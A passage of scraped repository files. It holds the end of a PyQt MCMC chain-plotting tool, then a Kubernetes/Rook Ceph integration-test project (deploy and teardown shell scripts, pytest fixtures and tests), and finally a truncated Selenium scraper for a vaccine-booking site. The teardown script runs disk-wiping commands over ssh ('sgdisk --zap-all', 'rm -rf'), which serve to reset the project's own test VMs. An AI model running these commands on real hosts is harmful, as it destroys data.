QT5\nmatplotlib.use('Qt5Agg')\nfrom PyQt5 import QtCore, QtWidgets\n\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.figure import Figure\n\nprogname = os.path.basename(sys.argv[0])\nprogversion = \"0.1\"\n\nclass MyMplCanvas(FigureCanvas):\n \"\"\"Ultimately, this is a QWidget (as well as a FigureCanvasAgg, etc.).\"\"\"\n\n def __init__(self, parent=None, width=5, height=4, dpi=100):\n fig = Figure(figsize=(width, height), dpi=dpi)\n self.axes = fig.add_subplot(111)\n\n self.compute_initial_figure()\n\n FigureCanvas.__init__(self, fig)\n self.setParent(parent)\n\n FigureCanvas.setSizePolicy(self,\n QtWidgets.QSizePolicy.Expanding,\n QtWidgets.QSizePolicy.Expanding)\n FigureCanvas.updateGeometry(self)\n\n def compute_initial_figure(self):\n pass\n\nclass ChainPlot(MyMplCanvas):\n \"\"\"A canvas that updates itself every second with a new plot.\"\"\"\n\n def __init__(self, *args, filename=None, param=None, **kwargs, ):\n MyMplCanvas.__init__(self, *args, **kwargs)\n self.filename=filename\n self.mtime=0\n self.param=param\n self.posterior=None\n timer = QtCore.QTimer(self)\n timer.timeout.connect(self.refresh_data)\n timer.start(1000)\n\n def refresh_data(self):\n if not self.filename: return\n if not os.path.exists(self.filename): return\n newtime = os.path.getmtime(self.filename)\n if newtime > self.mtime:\n self.mtime = newtime\n self.posterior = np.genfromtxt(self.filename,skip_footer=1,names=True,deletechars=\"\")\n self.update_figure()\n\n def update_figure(self):\n if self.posterior is None: return\n \n # Build a list of 4 random integers between 0 and 10 (both inclusive)\n self.axes.cla()\n self.axes.plot(self.posterior[self.param].T,',')\n self.axes.set_xlabel('iteration')\n self.axes.set_ylabel(self.param)\n self.axes.set_title(self.filename)\n self.figure.tight_layout()\n self.draw()\n\n\nclass ApplicationWindow(QtWidgets.QMainWindow):\n def __init__(self):\n QtWidgets.QMainWindow.__init__(self)\n self.infile=None\n self.param=None\n self.names=[]\n self.setAttribute(QtCore.Qt.WA_DeleteOnClose)\n self.setWindowTitle(\"application main window\")\n\n self.file_menu = QtWidgets.QMenu('&File', self)\n self.file_menu.addAction('&Open', self.fileLoad,\n QtCore.Qt.CTRL + QtCore.Qt.Key_O)\n self.file_menu.addAction('&Save Figure',self.figSave,\n QtCore.Qt.CTRL + QtCore.Qt.Key_S)\n self.file_menu.addAction('&Quit', self.fileQuit,\n QtCore.Qt.CTRL + QtCore.Qt.Key_Q)\n self.menuBar().addMenu(self.file_menu)\n\n self.help_menu = QtWidgets.QMenu('&Help', self)\n self.menuBar().addSeparator()\n self.menuBar().addMenu(self.help_menu)\n\n self.help_menu.addAction('&About', self.about)\n\n self.main_widget = QtWidgets.QWidget(self)\n\n l = QtWidgets.QVBoxLayout(self.main_widget)\n self.dc = ChainPlot(self.main_widget, width=5, height=4, dpi=100, filename=self.infile, param=self.param)\n l.addWidget(self.dc)\n \n # Box to select parameter\n grp=QtWidgets.QGroupBox('Parameters')\n bl=QtWidgets.QVBoxLayout(grp)\n self.pcombo=QtWidgets.QComboBox(self.main_widget)\n self.pcombo.currentTextChanged.connect(self.set_param)\n\n bl.addWidget(self.pcombo)\n l.addWidget(grp)\n \n self.main_widget.setFocus()\n self.setCentralWidget(self.main_widget)\n \n def fileLoad(self):\n \"\"\"\n Set the input file\n \"\"\"\n f, pattern = QtWidgets.QFileDialog(self,'Open File',self.infile).getOpenFileName(self,\"Set file to watch\")\n if f:\n self.set_infile(f)\n \n def figSave(self):\n f, pattern = QtWidgets.QFileDialog(self,'Save Figure',os.path.dirname(self.infile)).getSaveFileName(self,\"Choose file to save\")\n if f:\n self.dc.figure.savefig(f)\n self.statusBar().showMessage(f'{f}: file written')\n\n def fileQuit(self):\n self.close()\n\n def closeEvent(self, ce):\n self.fileQuit()\n\n def about(self):\n QtWidgets.QMessageBox.about(self, \"About\",\n \"\"\"chainplotter\n For monitoring MCMC chains\n author: J. Veitch <[email protected]>\"\"\"\n )\n\n def set_infile(self,filename):\n if not os.path.exists(filename):\n self.statusBar().showMessage(f'File not found: {filename}')\n return\n with open(filename) as f:\n self.names=f.readline().split()\n # Add combo box for parameter names\n self.pcombo.clear()\n self.pcombo.addItems(self.names)\n self.infile=filename\n self.dc.filename=filename\n self.dc.mtime=0\n self.dc.refresh_data()\n #self.dc.update_figure()\n \n def set_param(self,param):\n self.param=param\n self.dc.param=param\n self.dc.update_figure()\n\n\nif __name__=='__main__':\n from argparse import ArgumentParser\n parser=ArgumentParser(prog='chainplotter',description='A simple GUI for watching live MCMC chains')\n parser.add_argument('-i','--input',default=None,metavar='FILE',help='input file to plot')\n parser.add_argument('-p','--param',default=None,metavar='PARAMNAME',help='Parameter to plot')\n opts=parser.parse_args(sys.argv[1:])\n \n qApp = QtWidgets.QApplication(sys.argv)\n\n aw = ApplicationWindow()\n if opts.input: aw.set_infile(opts.input)\n if opts.param: aw.set_param(opts.param)\n aw.setWindowTitle(\"%s\" % progname)\n aw.show()\n sys.exit(qApp.exec_())\n #qApp.exec_()\n" }, { "alpha_fraction": 0.6848484873771667, "alphanum_fraction": 0.6909090876579285, "avg_line_length": 15.399999618530273, "blob_id": "c46cdbd57fb894447fc85df2efc9686567974e67", "content_id": "38e099e4eb99cbdd6677ddce40fb9c5e35def86a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 165, "license_type": "no_license", "max_line_length": 57, "num_lines": 10, "path": "/README.md", "repo_name": "johnveitch/chainplotter", "src_encoding": "UTF-8", "text": "# chainplotter\n\nAllows easy viewing of live MCMC chains with a simple GUI\n\n * author: John Veitch <[email protected]>\n\n\n### Example Usage\n\n`./chainplotter -i chain.txt -p param1`\n\n" } ]
2
sebastian-philipp/test-rook-orchestrator
https://github.com/sebastian-philipp/test-rook-orchestrator
feb2c9a74a7dab65bc68285316b1ad708ca2f485
dff53925832bf6851707f0180dca9f081e0ad874
8d3ba68d7fcb6cc65536a823fdf7bf5f435b8029
refs/heads/master
2020-05-06T12:19:14.439302
2019-05-16T14:11:12
2019-05-16T14:11:12
180,116,425
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.697756290435791, "alphanum_fraction": 0.7096348404884338, "avg_line_length": 33.40909194946289, "blob_id": "c9032a57e9d18127fb2f8c58b92604a23bec5c68", "content_id": "2c048f445276bf7efb43a6c3717ec68f07f37cf9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2273, "license_type": "no_license", "max_line_length": 130, "num_lines": 66, "path": "/undeploy-rook-ceph.sh", "repo_name": "sebastian-philipp/test-rook-orchestrator", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\nset -x\n\ncrs=\"CephNFS CephObjectStore CephFilesystem CephCluster job\"\napps=\"mon mgr osd mds rgw tools\"\n\n# finalizers can deadlock\ntimeout 30 kubectl patch --namespace=rook-ceph deployment rook-ceph-operator -p '{\"spec\": {\"replicas\": 0}}'\ntimeout 30 kubectl patch --namespace=rook-ceph crd cephcluster.ceph.rook.io -p '{\"metadata\":{\"finalizers\":[]}}' --type=merge\ntimeout 30 kubectl patch --namespace=rook-ceph cephcluster.ceph.rook.io rook-ceph -p '{\"metadata\":{\"finalizers\":[]}}' --type=merge\n\nfor cr in $crs\ndo\n timeout 30 kubectl delete --namespace=rook-ceph $cr --grace-period=0 --force --all\ndone\n\ntimeout 30 kubectl delete -f cluster-minimal.yaml\ntimeout 30 kubectl delete -f toolbox.yaml\ntimeout 30 kubectl delete --namespace=rook-ceph pod -n rook-ceph -l app=rook-ceph-operator\n\nfor primitive in service deployment pod\ndo\n for app in $(echo $apps)\n do\n timeout 30 kubectl delete --namespace=rook-ceph $primitive --grace-period=0 --force -l app=rook-ceph-$app\n done\ndone\n\ntimeout 30 kubectl delete pod --namespace=rook-ceph -l job=rook-ceph-detect-version\ntimeout 30 kubectl delete pod --namespace=rook-ceph -l job-name=rook-ceph-nfs-ganesha-rados-grace\n\nfor app in $(echo $apps)\ndo\n while kubectl get pod --namespace=rook-ceph -l app=rook-ceph-$app -o json | jq -e '.items[0].metadata.labels.app' ; do\n sleep 1\n done\ndone\n\nfor cr in $(echo $crs)\ndo\n while kubectl get --namespace=rook-ceph $cr rook-ceph ; do\n sleep 1\n done\ndone\n\n\npushd ./kubic-terraform-kvm\nfor h in $(terraform output -json | jq -r '.ips.value[][]')\ndo\n cat <<'EOF' | ssh -F ssh_config $h 'bash -x -s'\n#!/usr/bin/env bash\n# Zap the disk to a fresh, usable state (zap-all is important, b/c MBR has to be clean)\n# You will have to run this step for all disks.\nsgdisk --zap-all /dev/vdb\n\n# These steps only have to be run once on each node\n# If rook sets up osds using ceph-volume, teardown leaves some devices mapped that lock the disks.\nls /dev/mapper/ceph-* | xargs -I% -- dmsetup remove %\n# ceph-volume setup can leave ceph-<UUID> directories in /dev (unnecessary clutter)\nrm -rf /dev/ceph-*\nrm -rf /var/lib/rook\nEOF\ndone\npopd\n\nkubectl patch --namespace=rook-ceph deployment rook-ceph-operator -p '{\"spec\": {\"replicas\": 1}}'\n\n\n" }, { "alpha_fraction": 0.4528301954269409, "alphanum_fraction": 0.5283018946647644, "avg_line_length": 16.66666603088379, "blob_id": "51456f1803d1fb4e7ce505c836d0e19049ff2f28", "content_id": "a54d56cadbcffdc9277cf846f5defb3046fce0c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 53, "license_type": "no_license", "max_line_length": 41, "num_lines": 3, "path": "/waitssh.sh", "repo_name": "sebastian-philipp/test-rook-orchestrator", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\nwhile ! nc -z \"$1\" 22 ; do sleep 1 ; done\n" }, { "alpha_fraction": 0.6974790096282959, "alphanum_fraction": 0.7058823704719543, "avg_line_length": 13.875, "blob_id": "708f45f5a072a79e33ef2c0a0ced0c037732e63b", "content_id": "d1e5727a40b23f57de92d39d5303dd466008912e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 238, "license_type": "no_license", "max_line_length": 25, "num_lines": 16, "path": "/tox.ini", "repo_name": "sebastian-philipp/test-rook-orchestrator", "src_encoding": "UTF-8", "text": "[tox]\nenvlist = centos7\nskipsdist = True\n\n[testenv]\nbasepython = python3\nwhitelist_externals =\n terraform\n bash\n kubectl\npassenv=*\ndeps = -rrequirements.txt\ncommands=\n ./deploy-kubic.sh\n py.test {posargs}\n ./undeploy-kubic.sh\n" }, { "alpha_fraction": 0.7525773048400879, "alphanum_fraction": 0.7525773048400879, "avg_line_length": 18.399999618530273, "blob_id": "2e37ca2d9e908d80a74de603fc7b9d2b715dcd4a", "content_id": "fcf6203396aa513e5c220c4e181026b957b59b23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 97, "license_type": "no_license", "max_line_length": 37, "num_lines": 5, "path": "/deploy-rook-ceph.sh", "repo_name": "sebastian-philipp/test-rook-orchestrator", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\nset -ex\n\nkubectl apply -f cluster-minimal.yaml\nkubectl apply -f toolbox.yaml\n" }, { "alpha_fraction": 0.6539456844329834, "alphanum_fraction": 0.6720569133758545, "avg_line_length": 30.571428298950195, "blob_id": "50423c81b7921b451f4ac3aa1a4019b23ce4d1b0", "content_id": "441d8c75dd6439c86732a46acd42394fec383566", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1546, "license_type": "no_license", "max_line_length": 158, "num_lines": 49, "path": "/deploy-kubic.sh", "repo_name": "sebastian-philipp/test-rook-orchestrator", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\nset -ex\n\nwhich kubectl > /dev/null\nwhich terraform > /dev/null\n\nif [ \"$(kubectl get nodes | grep ' Ready ' | wc -l)\" == 3 ]\nthen\n echo -e \"\\e[91mWARNING: re-using exiting Kubernetes cluster.\\e[39m\"\n exit\nfi\n\npushd ./kubic-terraform-kvm\n\ntimeout 10m ./download-image.py\nterraform init\nterraform plan\nterraform apply -auto-approve\n./mk-ssh-config.sh\n\ntimeout 30 ../waitssh.sh $(terraform output -json | jq -r '.ips.value[0][]')\ncat <<'EOF' | ssh -F ssh_config $(terraform output -json | jq -r '.ips.value[0][]') 'bash -s'\nkubeadm init --cri-socket=/var/run/crio/crio.sock --pod-network-cidr=10.244.0.0/16\nmkdir -p $HOME/.kube\nsudo cp -i /etc/kubernetes/admin.conf $HOME/.kube/config\nsudo chown $(id -u):$(id -g) $HOME/.kube/config\nkubectl apply -f https://raw.githubusercontent.com/coreos/flannel/master/Documentation/kube-flannel.yml\nEOF\n\n\njoin_command=$(ssh -F ssh_config $(terraform output -json | jq -r '.ips.value[0][]') \"kubeadm token create --print-join-command\")\njoin_command=\"kubeadm join --cri-socket=/var/run/crio/crio.sock $(echo $join_command | python -c 'import sys; print(\" \".join(sys.stdin.read().split()[2:]))')\"\nssh -F ssh_config $(terraform output -json | jq -r '.ips.value[1][]') \"$join_command\"\nssh -F ssh_config $(terraform output -json | jq -r '.ips.value[2][]') \"$join_command\"\n\n\nscp -F ssh_config $(terraform output -json | jq -r '.ips.value[0][]'):~/.kube/config ~/.kube/config\n\n\ntimeout 5m bash <<'EOF'\nwhile [ \"$(kubectl get nodes | grep ' Ready ' | wc -l)\" != 3 ]\ndo\n sleep 1\ndone\nEOF\n\n\npopd" }, { "alpha_fraction": 0.6678956151008606, "alphanum_fraction": 0.6778218746185303, "avg_line_length": 37.74725341796875, "blob_id": "fd15b0e0b18417c1ddd5b484a58dfc94701072fc", "content_id": "ac5c6c906992089c286ad74fbcfe99a2ed773a87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3526, "license_type": "no_license", "max_line_length": 97, "num_lines": 91, "path": "/test_rook.py", "repo_name": "sebastian-philipp/test-rook-orchestrator", "src_encoding": "UTF-8", "text": "import json\n\nimport pytest\nimport requests\n\nfrom fixtures import _orch_exec, _wait_for_condition, _service_exist, _ceph_exec, ceph_cluster, \\\n get_pods, pods_started, dashboard_url, dashboard_token_header\n\n\ndef test_status(ceph_cluster):\n _orch_exec('status')\n\ndef test_service_ls(ceph_cluster):\n svs = json.loads(_orch_exec('service ls --format=json'))\n assert len(svs) >= 2\n\n\ndef test_device_ls(ceph_cluster):\n svs = json.loads(_orch_exec('device ls --format=json'))\n assert len(svs) >= 2\n\n\ndef test_mon_update(ceph_cluster):\n assert len(get_pods(labels='app=rook-ceph-mon')) < 3\n _orch_exec('mon update 3')\n # Two checkpoints in order to keep the timeouts low:\n _wait_for_condition(lambda: len(get_pods(labels='app=rook-ceph-mon')) >= 2)\n _wait_for_condition(lambda: len(get_pods(labels='app=rook-ceph-mon')) == 3)\n\n\ndef test_osd_create(ceph_cluster):\n assert 'osd' not in _orch_exec('service ls')\n #_orch_exec('osd create kubic-1:vdb --encrypted=true')\n #_orch_exec('osd create kubic-2:vdb --osds-per-device=2')\n _orch_exec('osd create kubic-1:vdb')\n _orch_exec('osd create kubic-2:vdb')\n # Two checkpoints in order to keep the timeouts reasonable:\n _wait_for_condition(lambda: len(get_pods(labels='app=rook-ceph-osd')) >= 1, timeout=180)\n _wait_for_condition(lambda: len(get_pods(labels='app=rook-ceph-osd')) >= 2, timeout=120)\n #_wait_for_condition(lambda: len(get_pods(labels='app=rook-ceph-osd')) >= 3, timeout=120)\n _wait_for_condition(lambda: _service_exist('osd'))\n _wait_for_condition(lambda: pods_started(labels='app=rook-ceph-osd'))\n\n\ndef test_nfs(ceph_cluster):\n assert _service_exist('osd')\n if not 'nfs-ganesha' in _ceph_exec('osd pool ls'):\n _ceph_exec(\"osd pool create nfs-ganesha 64\")\n assert not _service_exist('nfs')\n\n # TODO: test update_nfs_count\n\n _orch_exec(\"nfs add mynfs nfs-ganesha mynfs\")\n _wait_for_condition(lambda: len(get_pods(labels='app=rook-ceph-nfs')) >= 1, timeout=120)\n _wait_for_condition(lambda: pods_started(labels='app=rook-ceph-nfs'), timeout=60)\n _wait_for_condition(lambda: _service_exist('nfs'))\n\n _orch_exec(\"nfs rm mynfs\")\n _wait_for_condition(lambda: not _service_exist('nfs'))\n _wait_for_condition(lambda: not get_pods(labels='app=rook-ceph-nfs'))\n\n\ndef test_mds(ceph_cluster):\n assert not _service_exist('mds')\n _ceph_exec('fs volume create myname')\n _wait_for_condition(lambda: len(get_pods(labels='app=rook-ceph-mds')) == 2)\n _wait_for_condition(lambda: pods_started(labels='app=rook-ceph-mds'))\n _wait_for_condition(lambda: _service_exist('mds'))\n\n _ceph_exec('fs volume rm myname')\n _wait_for_condition(lambda: not _service_exist('mds'))\n _wait_for_condition(lambda: not get_pods(labels='app=rook-ceph-mds'))\n\n\n#@pytest.mark.skip(reason=\"needs image rebuild\")\ndef test_rgw(ceph_cluster):\n assert not _service_exist('rgw')\n _orch_exec(\"rgw add myrgw\")\n _wait_for_condition(lambda: len(get_pods(labels='app=rook-ceph-rgw')) >= 1, timeout=60)\n _wait_for_condition(lambda: pods_started(labels='app=rook-ceph-rgw'))\n _wait_for_condition(lambda: _service_exist('rgw'))\n\n _orch_exec(\"rgw rm myrgw\")\n _wait_for_condition(lambda: not _service_exist('rgw'))\n _wait_for_condition(lambda: not get_pods(labels='app=rook-ceph-rgw'))\n\n\ndef test_dashboard(ceph_cluster):\n url = f'{dashboard_url()}/api/summary'\n headers = dashboard_token_header(dashboard_url())\n requests.get(url, verify=False, headers=headers).raise_for_status()\n" }, { "alpha_fraction": 0.7368420958518982, "alphanum_fraction": 0.7368420958518982, "avg_line_length": 9.666666984558105, "blob_id": "41cfdb6aeb8fe8eceb9c46bab36eb54d663cc354", "content_id": "9b7e17040a810bce4f9d505dcda860e30ae28cdf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 95, "license_type": "no_license", "max_line_length": 31, "num_lines": 9, "path": "/undeploy-kubic.sh", "repo_name": "sebastian-philipp/test-rook-orchestrator", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\nset -e\n\npushd ./kubic-terraform-kvm\n\nterraform destroy -auto-approve\n\npopd" }, { "alpha_fraction": 0.7101770043373108, "alphanum_fraction": 0.7101770043373108, "avg_line_length": 17.875, "blob_id": "6bb9d7b6b144874927105920c8a33c03f26fe213", "content_id": "ee042ef4b2304dd524479608470c3fee4f075f34", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 452, "license_type": "no_license", "max_line_length": 93, "num_lines": 24, "path": "/README.md", "repo_name": "sebastian-philipp/test-rook-orchestrator", "src_encoding": "UTF-8", "text": "# Test Ceph Rook Orchestrator \n\npy.test project to run an integration test of Ceph's mgr/rook module.\n\n## Requirements\n\n* from: [`kubic-terraform-kvm`](https://github.com/kubic-project/kubic-terraform-kvm)\n * `terraform`\n * [`terraform-provider-libvirt`](https://github.com/dmacvicar/terraform-provider-libvirt)\n* docker\n* kubectl\n* ssh\n \n## Configuration\n\nThis test deploys the minimal cluster.\n\n \n## Usage\n\nSimple, just run:\n```bash\ntox\n```" }, { "alpha_fraction": 0.7415730357170105, "alphanum_fraction": 0.7415730357170105, "avg_line_length": 14, "blob_id": "70e10a2f92eac5f231df84207ff630628fbf5c62", "content_id": "236d0ad4622b4dabf3b356510a1fdcf8055323c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 89, "license_type": "no_license", "max_line_length": 30, "num_lines": 6, "path": "/deploy-rook-operator.sh", "repo_name": "sebastian-philipp/test-rook-orchestrator", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\nset -ex\n\nkubectl apply -f common.yaml\nkubectl apply -f operator.yaml" }, { "alpha_fraction": 0.6394995450973511, "alphanum_fraction": 0.6512957811355591, "avg_line_length": 33.32515335083008, "blob_id": "517c042c0c414395e1454ba2dbefb7610acec4eb", "content_id": "ccdcbf6975b845f47793e12352b0ed596bc4066b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5595, "license_type": "no_license", "max_line_length": 219, "num_lines": 163, "path": "/fixtures.py", "repo_name": "sebastian-philipp/test-rook-orchestrator", "src_encoding": "UTF-8", "text": "import base64\nimport time\nfrom subprocess import check_output, CalledProcessError\nfrom typing import List\n\nimport requests\nimport yaml\nfrom kubernetes import client, config\n#from kubetest import utils, objects\n#from kubetest.client import TestClient\nfrom kubernetes.client import V1Pod, V1Service, V1ServicePort, V1Secret\nfrom pytest import fixture\n\nceph_image = 'ceph/daemon-base:latest-master'\n#ceph_image = '192.168.122.1:5000/ceph/ceph:latest'\n\ndef download_rook_manifests():\n def change_flexvolume(text):\n yamls = list(yaml.safe_load_all(text))\n for y in yamls:\n try:\n if y['metadata']['name'] == 'rook-ceph-operator':\n flex = dict(name='FLEXVOLUME_DIR_PATH', value=\"/var/lib/kubelet/volumeplugins\")\n y['spec']['template']['spec']['containers'][0]['env'].append(flex)\n except (KeyError, TypeError):\n pass\n try:\n y['spec']['cephVersion']['allowUnsupported'] = True\n y['spec']['cephVersion']['image'] = ceph_image\n except (KeyError, TypeError):\n pass\n return yaml.safe_dump_all(yamls)\n\n def download(name):\n url = 'https://raw.githubusercontent.com/rook/rook/master/cluster/examples/kubernetes/ceph/{}.yaml'.format(name)\n r = requests.get(url)\n r.raise_for_status()\n with open(name + '.yaml', 'w') as f:\n f.write(change_flexvolume(r.text))\n\n for name in ['common', 'operator', 'cluster-minimal', 'toolbox', 'dashboard-external-https']:\n download(name)\n\n# @fixture(scope='module')\ndef rook_operator():\n download_rook_manifests()\n\n if not get_pods(labels='app=rook-ceph-operator'):\n check_output('./deploy-rook-operator.sh')\n\n _wait_for_condition(lambda: get_pods(labels='app=rook-ceph-operator'), 240)\n _wait_for_condition(lambda: pods_started(labels='app=rook-ceph-operator'), 240)\n _wait_for_condition(lambda: pods_started(labels='app=rook-ceph-agent'), 240)\n _wait_for_condition(lambda: pods_started(labels='app=rook-discover'), 240)\n\n@fixture(scope='module')\ndef ceph_cluster():\n config.load_kube_config()\n rook_operator()\n\n check_output('kubectl apply -f cluster-minimal.yaml', shell=True)\n _wait_for_condition(lambda: pods_started(labels='app=rook-ceph-mon'), 240)\n _wait_for_condition(lambda: pods_started(labels='app=rook-ceph-mgr'), 240)\n check_output('kubectl apply -f toolbox.yaml', shell=True) # now depends on running cluster.\n _wait_for_condition(lambda: pods_started(labels='app=rook-ceph-tools'), 240)\n _wait_for_condition(lambda: _service_exist('mon'))\n _wait_for_condition(lambda: _service_exist('mgr'))\n check_output('kubectl apply -f dashboard-external-https.yaml', shell=True)\n yield None\n check_output('./undeploy-rook-ceph.sh')\n\n\ndef _service_exist(name):\n try:\n return name in _orch_exec('service ls')\n except CalledProcessError:\n return False\n\ndef _orch_exec(cmd):\n return _ceph_exec('orchestrator ' + cmd)\n\n\ndef _ceph_exec(cmd):\n return _toolbox_exec('ceph ' + cmd)\n\n\ndef _toolbox_exec(cmd):\n return check_output(f\"\"\"timeout 60 kubectl -n rook-ceph exec -it $(kubectl -n rook-ceph get pod -l \"app=rook-ceph-tools\" -o jsonpath='{{.items[0].metadata.name}}') -- timeout 30 {cmd}\"\"\", shell=True).decode('utf-8')\n\n\ndef dashboard_url():\n service: V1Service = client.CoreV1Api().read_namespaced_service('rook-ceph-mgr-dashboard-external-https', 'rook-ceph')\n ports: List[V1ServicePort] = service.spec.ports\n\n mgr = get_pods(labels='app=rook-ceph-mgr')[0]\n return f'https://{mgr.status.host_ip}:{ports[0].node_port}'\n\n\ndef dashboard_password():\n s: V1Secret = client.CoreV1Api().read_namespaced_secret('rook-ceph-dashboard-password', 'rook-ceph')\n return base64.b64decode(s.data['password']).decode('utf-8')\n\n\ndef dashboard_token_header(url):\n r = requests.post(f'{url}/api/auth', json={'username': 'admin', 'password': dashboard_password()}, verify=False)\n return {'Authorization': f\"Bearer {r.json()['token']}\"}\n\n\ndef _wait_for_condition(condition, timeout=30):\n max_time = time.time() + timeout\n\n while True:\n if time.time() >= max_time:\n raise TimeoutError(\n 'timed out ({}s) while waiting for condition {}'\n .format(timeout, str(condition))\n )\n\n if condition():\n break\n\n time.sleep(1)\n\n\ndef get_pods(namespace='rook-ceph', fields: str=None, labels: str=None) -> List[V1Pod]:\n return client.CoreV1Api().list_namespaced_pod(\n namespace=namespace,\n **_field_labels_kwargs(fields, labels)\n ).items\n\n\ndef _field_labels_kwargs(fields, labels):\n kwargs = {}\n if fields:\n kwargs['field_selector'] = fields\n if labels:\n kwargs['label_selector'] = labels\n return kwargs\n\n\ndef containers_started(p: V1Pod):\n try:\n return all(cs.state.running.started_at is not None for cs in p.status.container_statuses)\n except (AttributeError, TypeError):\n return False\n\n\ndef pods_started(namespace='rook-ceph', fields: str=None, labels: str=None):\n pods = get_pods(namespace, fields=fields, labels=labels)\n if not pods:\n return False\n return all(containers_started(p) for p in pods)\n\n\nif __name__ == '__main__':\n config.load_kube_config()\n print(dashboard_url())\n print(dashboard_password())\n\n url = f'{dashboard_url()}/api/summary'\n headers = dashboard_token_header(dashboard_url())#\n\n requests.get(url, verify=False, headers=headers).raise_for_status()\n" } ]
10
kunalchamoli/vaccine_tracker
https://github.com/kunalchamoli/vaccine_tracker
588bb5a0fd9deb34961c9c2a7b7b23f7c736c456
70d7e968d6767d75b0a9436499b04ff0248de0c6
6a12016dff453badd6848cbfa9efd3b9df5c7e7d
refs/heads/main
2023-04-22T11:32:50.277487
2021-05-04T10:54:49
2021-05-04T10:54:49
364,223,300
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5848981142044067, "alphanum_fraction": 0.6012784838676453, "avg_line_length": 35.27536392211914, "blob_id": "9b405fc6c3154d07edfd5dec6c4d4ef9817d9e9f", "content_id": "973c45e2b694371f1b72720b9beecf623dd83823", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2503, "license_type": "no_license", "max_line_length": 151, "num_lines": 69, "path": "/first.py", "repo_name": "kunalchamoli/vaccine_tracker", "src_encoding": "UTF-8", "text": "import os\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options\nimport time\n\n\noptions = webdriver.ChromeOptions()\noptions.add_argument(\"--headless\")\ndriver = webdriver.Chrome(executable_path=os.path.abspath(\"chromedriver.exe\"))\n\n\ndriver.get('https://www.cowin.gov.in/home')\ntime.sleep(2)\n\ninput = driver.find_element_by_css_selector('input#mat-input-0')\ninput.send_keys('302017')\ninput.send_keys(Keys.ENTER)\n\ntime.sleep(1)\nage_restrict = driver.find_elements_by_css_selector(\n 'div:nth-child(3) > label')[0]\nage_restrict.click()\n\n# hospitals = driver.find_element_by_id(\"slot-available-wrap\")\n# hospitals = driver.find_element_by_css_selector(\n# 'div:nth-child(1) > div > div > div.slot-available-main.col-padding.col.col-lg-9.col-md-9.col-sm-9.col-xs-12 > ul > li:nth-child(1)')\n\n# total_div = driver.find_elements_by_xpath(\n# '//div[@class=\"mat-main-field center-main-field\"]')\n\ntotal_div = driver.find_elements_by_xpath(\n '/html/body/app-root/div/app-home/div[2]/div/appointment-table/div/div/div/div/div/div/div/div/div/div/div[2]/form/div/div/div[6]/div/div/div/div')\n\nfor item in total_div:\n div1 = driver.find_elements_by_xpath('.//div[@class = \"row\"]')\n div2 = driver.find_elements_by_xpath(\n './/div[@class = \"col-sm-12 col-md-12 col-lg-12\"]')\n div3 = driver.find_elements_by_xpath(\n './/div[@class = \"main-slider-wrap col col-lg-3 col-md-3 col-sm-3 col-xs-12\"]')[0]\n\n print(div3.text)\n\n div4 = driver.find_elements_by_xpath(\n './/div[@class = \"main-slider-wrap col col-lg-3 col-md-3 col-sm-3 col-xs-12\"]')[1]\n slots = driver.find_elements_by_xpath(\n './/ul[@class = \"slot-available-wrap\"]//li')\n\n for item in slots:\n print('\\n')\n print(item.text)\n\n # for i in range(len(slots)):\n # try:\n # val = driver.find_elements_by_xpath(\n # './/div[@class = \"slots-box ng-star-inserted\"]')\n # a = 1\n # except Exception:\n # try:\n # val = driver.find_elements_by_xpath(\n # './/div[@class = \"slots-box no-available ng-star-inserted\"]')\n # b = 1\n # except Exception:\n # try:\n # val = driver.find_elements_by_xpath(\n # './/div[@class = \"slots-box no-seat ng-star-inserted\"]')\n # c = 1\n # except Exception:\n # pass\n" }, { "alpha_fraction": 0.6974865198135376, "alphanum_fraction": 0.7100538611412048, "avg_line_length": 24.9069766998291, "blob_id": "e8928668546a73101c9b32639960dbc601bfbf06", "content_id": "ea3b9516783b599ac36a0f9a59aa0e3a7f48bda0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1114, "license_type": "no_license", "max_line_length": 151, "num_lines": 43, "path": "/new.py", "repo_name": "kunalchamoli/vaccine_tracker", "src_encoding": "UTF-8", "text": "import os\nimport time\nfrom collections import defaultdict\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options\n\n\noptions = Options()\noptions.headless = True\ndriver = webdriver.Chrome(executable_path=os.path.abspath(\n \"chromedriver.exe\"), options=options)\n\n\ndriver.get('https://www.cowin.gov.in/home')\ntime.sleep(2)\n\ninput = driver.find_element_by_css_selector('input#mat-input-0')\ninput.send_keys('302017')\ninput.send_keys(Keys.ENTER)\n\ntime.sleep(1)\nage_restrict = driver.find_elements_by_css_selector(\n 'div:nth-child(3) > label')[0]\nage_restrict.click()\n\n\ntotal_div = driver.find_elements_by_xpath(\n '/html/body/app-root/div/app-home/div[2]/div/appointment-table/div/div/div/div/div/div/div/div/div/div/div[2]/form/div/div/div[6]/div/div/div/div')\n\n\nfor item in total_div:\n print('\\n')\n div1 = 